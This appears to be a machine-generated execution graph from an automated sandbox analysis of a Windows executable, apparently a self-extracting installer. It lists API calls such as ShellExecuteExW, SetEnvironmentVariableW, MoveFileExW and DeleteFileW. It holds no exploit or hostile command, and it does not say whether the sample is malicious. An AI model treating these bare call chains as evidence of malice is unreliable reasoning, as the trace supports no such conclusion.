                                                                                                      execution_graph 23854 9f7a9b GetCurrentProcess GetLastError CloseHandle 23888 a0aa99 91 API calls 3 library calls 23856 a18aaa GetProcessHeap 23890 a0e7b0 51 API calls 2 library calls 23891 a04fb5 120 API calls __vswprintf_c_l 22151 9f1383 75 API calls 3 library calls 22152 a18abc 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23787 9f9481 72 API calls 22203 a0c782 22204 a0c730 22203->22204 22204->22203 22205 a0cabc ___delayLoadHelper2@8 19 API calls 22204->22205 22205->22204 23834 a09584 GetDlgItem EnableWindow ShowWindow SendMessageW 23756 a17695 23757 a176a0 23756->23757 23758 a179a7 11 API calls 23757->23758 23759 a176c9 23757->23759 23760 a176c5 23757->23760 23758->23757 23762 a176ed DeleteCriticalSection 23759->23762 23762->23760 23763 9f10a9 23768 9f5b35 23763->23768 23769 9f5b3f __EH_prolog 23768->23769 23770 9fac66 75 API calls 23769->23770 23771 9f5b4b 23770->23771 23775 9f5d2a GetCurrentProcess GetProcessAffinityMask 23771->23775 23835 a0899a GdipCloneImage GdipAlloc 23861 a10e9d 48 API calls 23792 a1c0e4 51 API calls 23837 9fddda FreeLibrary 23897 a0c3ea 19 API calls ___delayLoadHelper2@8 22137 9f9bc8 22138 9f9bdb 22137->22138 22139 9f9bd4 22137->22139 22140 9f9be1 GetStdHandle 22138->22140 22142 9f9bec 22138->22142 22140->22142 22141 9f9c41 WriteFile 22141->22142 22142->22139 22142->22141 22143 9f9c0c 22142->22143 22144 9f9c11 WriteFile 22142->22144 22146 9f9cb4 22142->22146 22148 9f6d5a 56 API calls 22142->22148 22143->22142 22143->22144 22144->22142 22144->22143 22149 9f6f67 68 API calls 22146->22149 22148->22142 22149->22139 23796 a188fb GetCommandLineA GetCommandLineW 23839 a0d5ff 27 API calls pre_c_initialization 22153 a0c7c0 22154 a0c791 22153->22154 22156 a0cabc 22154->22156 22184 a0c7ca 22156->22184 22158 a0cad6 22159 a0cb33 22158->22159 22172 a0cb57 22158->22172 22195 a0ca3a 11 API calls 3 library calls 22159->22195 22161 a0cb3e RaiseException 22162 a0cd2c 22161->22162 22163 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22162->22163 22165 a0cd3b 22163->22165 22164 a0cbcf LoadLibraryExA 22166 a0cc30 22164->22166 22167 a0cbe2 GetLastError 22164->22167 22165->22154 22171 a0cc42 22166->22171 22173 a0cc3b FreeLibrary 22166->22173 22168 a0cbf5 22167->22168 22169 a0cc0b 22167->22169 22168->22166 22168->22169 22196 a0ca3a 11 API calls 3 library calls 22169->22196 22170 a0cca0 GetProcAddress 22175 a0ccb0 GetLastError 22170->22175 22180 a0ccfe 22170->22180 22171->22170 22171->22180 22172->22164 22172->22166 22172->22171 22172->22180 22173->22171 22178 a0ccc3 22175->22178 22177 a0cc16 RaiseException 22177->22162 22178->22180 22197 a0ca3a 11 API calls 3 library calls 22178->22197 22198 a0ca3a 11 API calls 3 library calls 22180->22198 22181 a0cce4 RaiseException 22182 a0c7ca ___delayLoadHelper2@8 11 API calls 22181->22182 22183 a0ccfb 22182->22183 22183->22180 22185 a0c7d6 22184->22185 22186 a0c7fc 22184->22186 22199 a0c878 8 API calls 2 library calls 22185->22199 22186->22158 22188 a0c7db 22189 a0c7f7 22188->22189 22200 a0c9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 22188->22200 22201 a0c7fd GetModuleHandleW GetProcAddress GetProcAddress 22189->22201 22192 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22193 a0cab8 22192->22193 22193->22158 22194 a0ca87 22194->22192 22195->22161 22196->22177 22197->22181 22198->22162 22199->22188 22200->22189 22201->22194 23901 a063c3 115 API calls 22206 9f18fb 127 API calls __EH_prolog 23902 a16fcb 71 API calls _free 23864 a086cb 22 API calls 23865 a17ecd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23866 a0aa99 101 API calls 4 library calls 23148 a0c0d0 23149 a0c0dd 23148->23149 23150 9fd142 54 API calls 23149->23150 23151 a0c0f1 23150->23151 23152 9f3f5b _swprintf 51 API calls 23151->23152 23153 a0c103 SetDlgItemTextW 23152->23153 23156 a0991e PeekMessageW 23153->23156 23157 a09939 GetMessageW TranslateMessage DispatchMessageW 23156->23157 23158 a0995a 23156->23158 23157->23158 23800 a07cd5 GetClientRect 23867 a14ed4 55 API calls _free 23801 a0aa99 96 API calls 4 library calls 23904 a14bda 52 API calls 2 library calls 23868 9f16e3 79 API calls 23804 a0b820 72 API calls 23840 a09123 73 API calls 21897 a0c726 19 API calls ___delayLoadHelper2@8 23806 9f1019 29 API calls pre_c_initialization 21899 a16428 21907 a1784c 21899->21907 21902 a1643c 21904 a16444 21905 a16451 21904->21905 21915 a16454 11 API calls 21904->21915 21916 a17735 21907->21916 21910 a1788b TlsAlloc 21911 a1787c 21910->21911 21923 a0d783 21911->21923 21913 a16432 21913->21902 21914 a163a3 20 API calls 3 library calls 21913->21914 21914->21904 21915->21902 21917 a17765 21916->21917 21920 a17761 21916->21920 21917->21910 21917->21911 21918 a17785 21918->21917 21921 a17791 GetProcAddress 21918->21921 21920->21917 21920->21918 21930 a177d1 21920->21930 21922 a177a1 __crt_fast_encode_pointer 21921->21922 21922->21917 21924 a0d78c 21923->21924 21925 a0d78e IsProcessorFeaturePresent 21923->21925 21924->21913 21927 a0ddb8 21925->21927 21937 a0dd7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21927->21937 21929 a0de9b 21929->21913 21931 a177f2 LoadLibraryExW 21930->21931 21932 a177e7 21930->21932 21933 a17827 21931->21933 21934 a1780f GetLastError 21931->21934 21932->21920 21933->21932 21935 a1783e FreeLibrary 21933->21935 21934->21933 21936 a1781a LoadLibraryExW 21934->21936 21935->21932 21936->21933 21937->21929 23807 a1f830 DeleteCriticalSection 23905 a0d736 20 API calls 23841 a0a537 93 API calls _swprintf 23842 a15536 8 API calls ___vcrt_uninitialize 23843 a00d3a 26 API calls std::bad_exception::bad_exception 23845 a13501 QueryPerformanceFrequency QueryPerformanceCounter 23906 a1c301 21 API calls __vswprintf_c_l 23873 a10a00 6 API calls 4 library calls 23812 a0d002 38 API calls 2 library calls 23907 a16f03 21 API calls 2 library calls 23159 a0d611 23160 a0d61d ___scrt_is_nonwritable_in_current_image 23159->23160 23185 a0d126 23160->23185 23163 a0d624 23164 a0d64d 23163->23164 23262 a0da75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23163->23262 23170 a0d68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23164->23170 23196 a1572c 23164->23196 23168 a0d66c ___scrt_is_nonwritable_in_current_image 23169 a0d6ec 23204 a0db90 23169->23204 23170->23169 23263 a14760 38 API calls 3 library calls 23170->23263 23180 a0d718 23182 a0d721 23180->23182 23264 a14b67 28 API calls _abort 23180->23264 23265 a0d29d 13 API calls 2 library calls 23182->23265 23186 a0d12f 23185->23186 23266 a0d8cb IsProcessorFeaturePresent 23186->23266 23188 a0d13b 23267 a10b66 23188->23267 23190 a0d140 23195 a0d144 23190->23195 23276 a155b9 23190->23276 23193 a0d15b 23193->23163 23195->23163 23197 a15743 23196->23197 23198 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23197->23198 23199 a0d666 23198->23199 23199->23168 23200 a156d0 23199->23200 23202 a156ff 23200->23202 23201 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23203 a15728 23201->23203 23202->23201 23203->23170 23375 a0dea0 23204->23375 23206 a0dba3 GetStartupInfoW 23207 a0d6f2 23206->23207 23208 a1567d 23207->23208 23377 a18558 23208->23377 23210 a0d6fb 23213 a0c131 23210->23213 23212 a15686 23212->23210 23381 a188e3 38 API calls 23212->23381 23502 9ff353 23213->23502 23217 a0c150 23551 a09036 23217->23551 23219 a0c159 23555 a00722 GetCPInfo 23219->23555 23221 a0c163 ___scrt_get_show_window_mode 23222 a0c176 GetCommandLineW 23221->23222 23223 a0c203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23222->23223 23224 a0c185 23222->23224 23225 9f3f5b _swprintf 51 API calls 23223->23225 23558 a0a8d4 23224->23558 23227 a0c26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 23225->23227 23571 a09a76 LoadBitmapW 23227->23571 23230 a0c193 OpenFileMappingW 23234 a0c1f3 CloseHandle 23230->23234 23235 a0c1ac MapViewOfFile 23230->23235 23231 a0c1fd 23565 a0be0a 23231->23565 23234->23223 23237 a0c1ea UnmapViewOfFile 23235->23237 23238 a0c1bd __vswprintf_c_l 23235->23238 23237->23234 23239 a0be0a 2 API calls 23238->23239 23241 a0c1d9 23239->23241 23240 a0c2b3 23242 a0c2c5 DialogBoxParamW 23240->23242 23241->23237 23243 a0c2ff 23242->23243 23244 a0c311 Sleep 23243->23244 23245 a0c318 23243->23245 23244->23245 23248 a0c326 23245->23248 23596 a09237 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23245->23596 23247 a0c345 DeleteObject 23249 a0c35c DeleteObject 23247->23249 23250 a0c35f 23247->23250 23248->23247 23249->23250 23251 a0c390 23250->23251 23252 a0c3a2 23250->23252 23597 a0be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23251->23597 23594 a0909e 23252->23594 23255 a0c396 CloseHandle 23255->23252 23256 a0c3dc 23257 a14a9b GetModuleHandleW 23256->23257 23258 a0d70e 23257->23258 23258->23180 23259 a14bc4 23258->23259 23705 a14941 23259->23705 23262->23163 23263->23169 23264->23182 23265->23168 23266->23188 23268 a10b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23267->23268 23280 a11c0e 23268->23280 23271 a10b79 23271->23190 23273 a10b81 23274 a10b8c 23273->23274 23294 a11c4a DeleteCriticalSection 23273->23294 23274->23190 23322 a18ac5 23276->23322 23279 a10b8f 8 API calls 3 library calls 23279->23195 23281 a11c17 23280->23281 23283 a11c40 23281->23283 23285 a10b75 23281->23285 23295 a11e85 23281->23295 23300 a11c4a DeleteCriticalSection 23283->23300 23285->23271 23286 a10ca6 23285->23286 23315 a11d9a 23286->23315 23288 a10cb0 23289 a10cbb 23288->23289 23320 a11e48 6 API calls try_get_function 23288->23320 23289->23273 23291 a10cc9 23292 a10cd6 23291->23292 23321 a10cd9 6 API calls ___vcrt_FlsFree 23291->23321 23292->23273 23294->23271 23301 a11c79 23295->23301 23298 a11ea8 23298->23281 23299 a11ebc InitializeCriticalSectionAndSpinCount 23299->23298 23300->23285 23302 a11cad 23301->23302 23305 a11ca9 23301->23305 23302->23298 23302->23299 23303 a11ccd 23303->23302 23306 a11cd9 GetProcAddress 23303->23306 23305->23302 23305->23303 23308 a11d19 23305->23308 23307 a11ce9 __crt_fast_encode_pointer 23306->23307 23307->23302 23309 a11d41 LoadLibraryExW 23308->23309 23313 a11d36 23308->23313 23310 a11d75 23309->23310 23311 a11d5d GetLastError 23309->23311 23310->23313 23314 a11d8c FreeLibrary 23310->23314 23311->23310 23312 a11d68 LoadLibraryExW 23311->23312 23312->23310 23313->23305 23314->23313 23316 a11c79 try_get_function 5 API calls 23315->23316 23317 a11db4 23316->23317 23318 a11dcc TlsAlloc 23317->23318 23319 a11dbd 23317->23319 23319->23288 23320->23291 23321->23289 23323 a18ae2 23322->23323 23326 a18ade 23322->23326 23323->23326 23328 a171c0 23323->23328 23324 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23325 a0d14d 23324->23325 23325->23193 23325->23279 23326->23324 23329 a171cc ___scrt_is_nonwritable_in_current_image 23328->23329 23340 a176d6 EnterCriticalSection 23329->23340 23331 a171d3 23341 a18f93 23331->23341 23333 a171e2 23339 a171f1 23333->23339 23354 a17054 29 API calls 23333->23354 23336 a171ec 23355 a1710a GetStdHandle GetFileType 23336->23355 23337 a17202 ___scrt_is_nonwritable_in_current_image 23337->23323 23356 a1720d LeaveCriticalSection _abort 23339->23356 23340->23331 23342 a18f9f ___scrt_is_nonwritable_in_current_image 23341->23342 23343 a18fc3 23342->23343 23344 a18fac 23342->23344 23357 a176d6 EnterCriticalSection 23343->23357 23365 a15e3e 20 API calls _abort 23344->23365 23347 a18fb1 23366 a15d1d 26 API calls ___std_exception_copy 23347->23366 23348 a18fcf 23353 a18ffb 23348->23353 23358 a18ee4 23348->23358 23350 a18fbb ___scrt_is_nonwritable_in_current_image 23350->23333 23367 a19022 LeaveCriticalSection _abort 23353->23367 23354->23336 23355->23339 23356->23337 23357->23348 23359 a15a8d ___InternalCxxFrameHandler 20 API calls 23358->23359 23360 a18ef6 23359->23360 23364 a18f03 23360->23364 23368 a179a7 23360->23368 23361 a159c2 _free 20 API calls 23363 a18f55 23361->23363 23363->23348 23364->23361 23365->23347 23366->23350 23367->23350 23369 a17735 _abort 5 API calls 23368->23369 23370 a179ce 23369->23370 23371 a179ec InitializeCriticalSectionAndSpinCount 23370->23371 23372 a179d7 23370->23372 23371->23372 23373 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23372->23373 23374 a17a03 23373->23374 23374->23360 23376 a0deb7 23375->23376 23376->23206 23376->23376 23378 a18561 23377->23378 23379 a1856a 23377->23379 23382 a18457 23378->23382 23379->23212 23381->23212 23383 a1631f _abort 38 API calls 23382->23383 23384 a18464 23383->23384 23402 a18576 23384->23402 23386 a1846c 23411 a181eb 23386->23411 23389 a18483 23389->23379 23390 a159fc __vswprintf_c_l 21 API calls 23391 a18494 23390->23391 23401 a184c6 23391->23401 23418 a18618 23391->23418 23394 a159c2 _free 20 API calls 23394->23389 23395 a184c1 23428 a15e3e 20 API calls _abort 23395->23428 23396 a184de 23398 a1850a 23396->23398 23399 a159c2 _free 20 API calls 23396->23399 23398->23401 23429 a180c1 26 API calls 23398->23429 23399->23398 23401->23394 23403 a18582 ___scrt_is_nonwritable_in_current_image 23402->23403 23404 a1631f _abort 38 API calls 23403->23404 23409 a1858c 23404->23409 23406 a18610 ___scrt_is_nonwritable_in_current_image 23406->23386 23409->23406 23410 a159c2 _free 20 API calls 23409->23410 23430 a15a4a 38 API calls _abort 23409->23430 23431 a176d6 EnterCriticalSection 23409->23431 23432 a18607 LeaveCriticalSection _abort 23409->23432 23410->23409 23412 a12636 __fassign 38 API calls 23411->23412 23413 a181fd 23412->23413 23414 a1820c GetOEMCP 23413->23414 23415 a1821e 23413->23415 23416 a18235 23414->23416 23415->23416 23417 a18223 GetACP 23415->23417 23416->23389 23416->23390 23417->23416 23419 a181eb 40 API calls 23418->23419 23421 a18637 23419->23421 23420 a1863e 23423 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23420->23423 23421->23420 23422 a186ad ___scrt_get_show_window_mode 23421->23422 23425 a18688 IsValidCodePage 23421->23425 23433 a182c3 GetCPInfo 23422->23433 23424 a184b9 23423->23424 23424->23395 23424->23396 23425->23420 23426 a1869a GetCPInfo 23425->23426 23426->23420 23426->23422 23428->23401 23429->23401 23431->23409 23432->23409 23439 a182fd 23433->23439 23442 a183a7 23433->23442 23436 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23438 a18453 23436->23438 23438->23420 23443 a193f3 23439->23443 23441 a175cb __vswprintf_c_l 43 API calls 23441->23442 23442->23436 23444 a12636 __fassign 38 API calls 23443->23444 23445 a19413 MultiByteToWideChar 23444->23445 23447 a19451 23445->23447 23454 a194e9 23445->23454 23448 a19472 __vswprintf_c_l ___scrt_get_show_window_mode 23447->23448 23450 a159fc __vswprintf_c_l 21 API calls 23447->23450 23452 a194e3 23448->23452 23455 a194b7 MultiByteToWideChar 23448->23455 23449 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23451 a1835e 23449->23451 23450->23448 23457 a175cb 23451->23457 23462 a17616 20 API calls _free 23452->23462 23454->23449 23455->23452 23456 a194d3 GetStringTypeW 23455->23456 23456->23452 23458 a12636 __fassign 38 API calls 23457->23458 23459 a175de 23458->23459 23463 a173ae 23459->23463 23462->23454 23464 a173c9 __vswprintf_c_l 23463->23464 23465 a173ef MultiByteToWideChar 23464->23465 23466 a175a3 23465->23466 23467 a17419 23465->23467 23468 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23466->23468 23470 a159fc __vswprintf_c_l 21 API calls 23467->23470 23473 a1743a __vswprintf_c_l 23467->23473 23469 a175b6 23468->23469 23469->23441 23470->23473 23471 a17483 MultiByteToWideChar 23472 a174ef 23471->23472 23474 a1749c 23471->23474 23499 a17616 20 API calls _free 23472->23499 23473->23471 23473->23472 23490 a17a09 23474->23490 23478 a174c6 23478->23472 23480 a17a09 __vswprintf_c_l 11 API calls 23478->23480 23479 a174fe 23482 a159fc __vswprintf_c_l 21 API calls 23479->23482 23483 a1751f __vswprintf_c_l 23479->23483 23480->23472 23481 a17594 23498 a17616 20 API calls _free 23481->23498 23482->23483 23483->23481 23484 a17a09 __vswprintf_c_l 11 API calls 23483->23484 23486 a17573 23484->23486 23486->23481 23487 a17582 WideCharToMultiByte 23486->23487 23487->23481 23488 a175c2 23487->23488 23500 a17616 20 API calls _free 23488->23500 23491 a17735 _abort 5 API calls 23490->23491 23492 a17a30 23491->23492 23495 a17a39 23492->23495 23501 a17a91 10 API calls 3 library calls 23492->23501 23494 a17a79 LCMapStringW 23494->23495 23496 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23495->23496 23497 a174b3 23496->23497 23497->23472 23497->23478 23497->23479 23498->23472 23499->23466 23500->23472 23501->23494 23503 a0cec0 23502->23503 23504 9ff35d GetModuleHandleW 23503->23504 23505 9ff3c8 23504->23505 23506 9ff377 GetProcAddress 23504->23506 23507 9ff6fd GetModuleFileNameW 23505->23507 23604 a1462a 42 API calls __vswprintf_c_l 23505->23604 23508 9ff3a0 GetProcAddress 23506->23508 23509 9ff390 23506->23509 23522 9ff718 23507->23522 23508->23505 23511 9ff3ac 23508->23511 23509->23508 23511->23505 23512 9ff63b 23512->23507 23513 9ff646 GetModuleFileNameW CreateFileW 23512->23513 23514 9ff675 SetFilePointer 23513->23514 23515 9ff6f1 CloseHandle 23513->23515 23514->23515 23516 9ff685 ReadFile 23514->23516 23515->23507 23516->23515 23519 9ff6a4 23516->23519 23517 9fa8e0 GetVersionExW 23517->23522 23519->23515 23521 9ff309 2 API calls 23519->23521 23520 9ff74d CompareStringW 23520->23522 23521->23519 23522->23517 23522->23520 23523 9ff797 23522->23523 23524 9ff783 GetFileAttributesW 23522->23524 23598 9ff309 23522->23598 23525 9ff7a4 23523->23525 23528 9ff7d6 23523->23528 23524->23522 23524->23523 23527 9ff7bc GetFileAttributesW 23525->23527 23529 9ff7d0 23525->23529 23526 9ff8e5 23550 a08b8e GetCurrentDirectoryW 23526->23550 23527->23525 23527->23529 23528->23526 23530 9fa8e0 GetVersionExW 23528->23530 23529->23528 23531 9ff7f0 23530->23531 23532 9ff85d 23531->23532 23533 9ff7f7 23531->23533 23535 9f3f5b _swprintf 51 API calls 23532->23535 23534 9ff309 2 API calls 23533->23534 23537 9ff801 23534->23537 23536 9ff885 AllocConsole 23535->23536 23538 9ff8dd ExitProcess 23536->23538 23539 9ff892 GetCurrentProcessId AttachConsole 23536->23539 23540 9ff309 2 API calls 23537->23540 23605 a120b3 23539->23605 23542 9ff80b 23540->23542 23544 9fd142 54 API calls 23542->23544 23543 9ff8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 23543->23538 23545 9ff826 23544->23545 23546 9f3f5b _swprintf 51 API calls 23545->23546 23547 9ff839 23546->23547 23548 9fd142 54 API calls 23547->23548 23549 9ff848 23548->23549 23549->23538 23550->23217 23552 9ff309 2 API calls 23551->23552 23553 a0904a OleInitialize 23552->23553 23554 a0906d GdiplusStartup SHGetMalloc 23553->23554 23554->23219 23556 a00746 IsDBCSLeadByte 23555->23556 23556->23556 23557 a0075e 23556->23557 23557->23221 23559 a0a8de 23558->23559 23560 a0a9f4 23559->23560 23561 a0a926 CharUpperW 23559->23561 23562 a0a9a9 CharUpperW 23559->23562 23564 a0a94d CharUpperW 23559->23564 23607 9fdfde 73 API calls ___scrt_get_show_window_mode 23559->23607 23560->23230 23560->23231 23561->23559 23562->23559 23564->23559 23566 a0cec0 23565->23566 23567 a0be17 SetEnvironmentVariableW 23566->23567 23569 a0be3a 23567->23569 23568 a0be62 23568->23223 23569->23568 23570 a0be56 SetEnvironmentVariableW 23569->23570 23570->23568 23572 a09aa0 GetObjectW 23571->23572 23573 a09a97 23571->23573 23575 a08ac0 6 API calls 23572->23575 23608 a08bd0 FindResourceW 23573->23608 23577 a09ab2 23575->23577 23578 a09af3 23577->23578 23579 a09ad3 23577->23579 23581 a08bd0 13 API calls 23577->23581 23589 9fcaa7 23578->23589 23624 a08b22 GetDC GetDeviceCaps ReleaseDC 23579->23624 23583 a09ac8 23581->23583 23582 a09adb 23625 a08adf GetDC GetDeviceCaps ReleaseDC 23582->23625 23583->23579 23585 a09ace DeleteObject 23583->23585 23585->23579 23586 a09ae4 23626 a08cf3 8 API calls ___scrt_get_show_window_mode 23586->23626 23588 a09aeb DeleteObject 23588->23578 23635 9fcacc 23589->23635 23593 9fcaba 23593->23240 23595 a090c4 GdiplusShutdown CoUninitialize 23594->23595 23595->23256 23596->23248 23597->23255 23599 a0cec0 23598->23599 23600 9ff316 GetSystemDirectoryW 23599->23600 23601 9ff32e 23600->23601 23602 9ff34c 23600->23602 23603 9ff33f LoadLibraryW 23601->23603 23602->23522 23603->23602 23604->23512 23606 a120bb 23605->23606 23606->23543 23606->23606 23607->23559 23609 a08bf1 SizeofResource 23608->23609 23610 a08c23 23608->23610 23609->23610 23611 a08c05 LoadResource 23609->23611 23610->23572 23611->23610 23612 a08c16 LockResource 23611->23612 23612->23610 23613 a08c2a GlobalAlloc 23612->23613 23613->23610 23614 a08c41 GlobalLock 23613->23614 23615 a08cb8 GlobalFree 23614->23615 23616 a08c4c __vswprintf_c_l 23614->23616 23615->23610 23617 a08c54 CreateStreamOnHGlobal 23616->23617 23618 a08cb1 GlobalUnlock 23617->23618 23619 a08c6c 23617->23619 23618->23615 23627 a08b65 GdipAlloc 23619->23627 23622 a08c90 GdipCreateHBITMAPFromBitmap 23623 a08ca6 23622->23623 23623->23618 23624->23582 23625->23586 23626->23588 23628 a08b84 23627->23628 23629 a08b77 23627->23629 23628->23618 23628->23622 23628->23623 23631 a08924 23629->23631 23632 a08945 GdipCreateBitmapFromStreamICM 23631->23632 23633 a0894c GdipCreateBitmapFromStream 23631->23633 23634 a08951 23632->23634 23633->23634 23634->23628 23636 9fcad6 _wcschr __EH_prolog 23635->23636 23637 9fcb02 GetModuleFileNameW 23636->23637 23638 9fcb33 23636->23638 23639 9fcb1c 23637->23639 23658 9f973d 23638->23658 23639->23638 23641 9f9437 72 API calls 23642 9fcab3 23641->23642 23654 9fce48 GetModuleHandleW FindResourceW 23642->23654 23644 9f99e0 70 API calls 23646 9fccb9 ___std_exception_copy 23644->23646 23647 9f990d 73 API calls 23646->23647 23653 9fcce9 23646->23653 23651 9fccdf ___std_exception_copy 23647->23651 23649 9fcb63 23650 9fcc9f 23649->23650 23649->23653 23667 9f9aeb 23649->23667 23675 9f990d 23649->23675 23683 9f99e0 23649->23683 23650->23644 23650->23653 23651->23653 23688 a006e9 MultiByteToWideChar 23651->23688 23653->23641 23655 9fce76 23654->23655 23657 9fce70 23654->23657 23656 9fc91f 52 API calls 23655->23656 23656->23657 23657->23593 23659 9f9747 23658->23659 23660 9f979d CreateFileW 23659->23660 23661 9f981b 23660->23661 23662 9f97ca GetLastError 23660->23662 23661->23649 23663 9fb275 2 API calls 23662->23663 23664 9f97ea 23663->23664 23664->23661 23665 9f97ee CreateFileW GetLastError 23664->23665 23666 9f9812 23665->23666 23666->23661 23668 9f9b0f SetFilePointer 23667->23668 23669 9f9afe 23667->23669 23670 9f9b2d GetLastError 23668->23670 23673 9f9b48 23668->23673 23669->23673 23689 9f6eae 68 API calls 23669->23689 23672 9f9b37 23670->23672 23670->23673 23672->23673 23690 9f6eae 68 API calls 23672->23690 23673->23649 23677 9f9924 23675->23677 23678 9f9985 23677->23678 23679 9f9977 23677->23679 23681 9f9987 23677->23681 23691 9f9613 23677->23691 23678->23649 23703 9f6e74 68 API calls 23679->23703 23681->23678 23682 9f9613 5 API calls 23681->23682 23682->23681 23684 9f9897 2 API calls 23683->23684 23685 9f99f4 23684->23685 23686 9f9a0b 23685->23686 23704 9f6eae 68 API calls 23685->23704 23686->23649 23688->23653 23689->23668 23690->23673 23692 9f962c ReadFile 23691->23692 23693 9f9621 GetStdHandle 23691->23693 23694 9f9665 23692->23694 23695 9f9645 23692->23695 23693->23692 23694->23677 23696 9f971a GetFileType 23695->23696 23697 9f964c 23696->23697 23698 9f965a 23697->23698 23699 9f966d GetLastError 23697->23699 23700 9f967c 23697->23700 23702 9f9613 GetFileType 23698->23702 23699->23694 23699->23700 23700->23694 23701 9f968c GetLastError 23700->23701 23701->23694 23701->23698 23702->23694 23703->23678 23704->23686 23706 a1494d _abort 23705->23706 23707 a14965 23706->23707 23709 a14a9b _abort GetModuleHandleW 23706->23709 23727 a176d6 EnterCriticalSection 23707->23727 23710 a14959 23709->23710 23710->23707 23739 a14adf GetModuleHandleExW 23710->23739 23713 a1496d 23722 a149e2 23713->23722 23725 a14a0b 23713->23725 23747 a15447 20 API calls _abort 23713->23747 23715 a14a54 23748 a1f149 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23715->23748 23716 a14a28 23731 a14a5a 23716->23731 23719 a156d0 _abort 5 API calls 23724 a149fa 23719->23724 23720 a156d0 _abort 5 API calls 23720->23725 23722->23719 23722->23724 23724->23720 23728 a14a4b 23725->23728 23727->23713 23749 a1771e LeaveCriticalSection 23728->23749 23730 a14a24 23730->23715 23730->23716 23750 a17b13 23731->23750 23734 a14a88 23737 a14adf _abort 8 API calls 23734->23737 23735 a14a68 GetPEB 23735->23734 23736 a14a78 GetCurrentProcess TerminateProcess 23735->23736 23736->23734 23738 a14a90 ExitProcess 23737->23738 23740 a14b09 GetProcAddress 23739->23740 23741 a14b2c 23739->23741 23742 a14b1e 23740->23742 23743 a14b32 FreeLibrary 23741->23743 23744 a14b3b 23741->23744 23742->23741 23743->23744 23745 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23744->23745 23746 a14b45 23745->23746 23746->23707 23747->23722 23749->23730 23751 a17b38 23750->23751 23755 a17b2e 23750->23755 23752 a17735 _abort 5 API calls 23751->23752 23752->23755 23753 a0d783 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23754 a14a64 23753->23754 23754->23734 23754->23735 23755->23753 23877 a17216 21 API calls 23878 a1ee16 CloseHandle 23818 9f605e 73 API calls 23908 a11f60 RtlUnwind 23847 a08963 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 23909 a1d774 IsProcessorFeaturePresent 21942 a0b077 21944 a0b07c 21942->21944 21953 a0aa99 _wcsrchr 21942->21953 21944->21953 21968 a0b9aa 21944->21968 21945 a0b642 21948 a0ad86 SetWindowTextW 21948->21953 21953->21945 21953->21948 21960 a0af50 GetDlgItem SetWindowTextW SendMessageW 21953->21960 21963 a0af92 SendMessageW 21953->21963 21965 a0ab6a ___scrt_get_show_window_mode 21953->21965 21967 a00b12 CompareStringW 21953->21967 21991 a096ec 21953->21991 21995 a08b8e GetCurrentDirectoryW 21953->21995 21996 9fa1a9 7 API calls 21953->21996 22002 9fa132 FindClose 21953->22002 22003 a09844 69 API calls ___std_exception_copy 21953->22003 22004 a120de 21953->22004 21954 a0ab77 SetFileAttributesW 21956 a0ac32 GetFileAttributesW 21954->21956 21954->21965 21958 a0ac40 DeleteFileW 21956->21958 21956->21965 21958->21965 21960->21953 21963->21953 21964 a0ac86 MoveFileW 21964->21965 21966 a0ac9e MoveFileExW 21964->21966 21965->21953 21965->21954 21965->21956 21997 9fb100 52 API calls 2 library calls 21965->21997 21998 9f3f5b 21965->21998 22001 9fa1a9 7 API calls 21965->22001 21966->21965 21967->21953 21970 a0b9b4 ___scrt_get_show_window_mode 21968->21970 21969 a0bc0c 21969->21953 21970->21969 21971 a0ba9f 21970->21971 22020 a00b12 CompareStringW 21970->22020 22017 9f9dff 21971->22017 21975 a0bad3 ShellExecuteExW 21975->21969 21982 a0bae6 21975->21982 21977 a0bacb 21977->21975 21978 a0bb21 22022 a0be69 WaitForSingleObject PeekMessageW WaitForSingleObject 21978->22022 21979 a0bb77 CloseHandle 21980 a0bb90 21979->21980 21981 a0bb85 21979->21981 21980->21969 21987 a0bc07 ShowWindow 21980->21987 22023 a00b12 CompareStringW 21981->22023 21982->21978 21982->21979 21984 a0bb1b ShowWindow 21982->21984 21984->21978 21986 a0bb39 21986->21979 21988 a0bb4c GetExitCodeProcess 21986->21988 21987->21969 21988->21979 21989 a0bb5f 21988->21989 21989->21979 21992 a096f6 21991->21992 21993 a097a9 ExpandEnvironmentStringsW 21992->21993 21994 a097cc 21992->21994 21993->21994 21994->21953 21995->21953 21996->21953 21997->21965 22047 9f3f2e 21998->22047 22001->21965 22002->21953 22003->21953 22005 a15aea 22004->22005 22006 a15b02 22005->22006 22007 a15af7 22005->22007 22009 a15b0a 22006->22009 22015 a15b13 ___InternalCxxFrameHandler 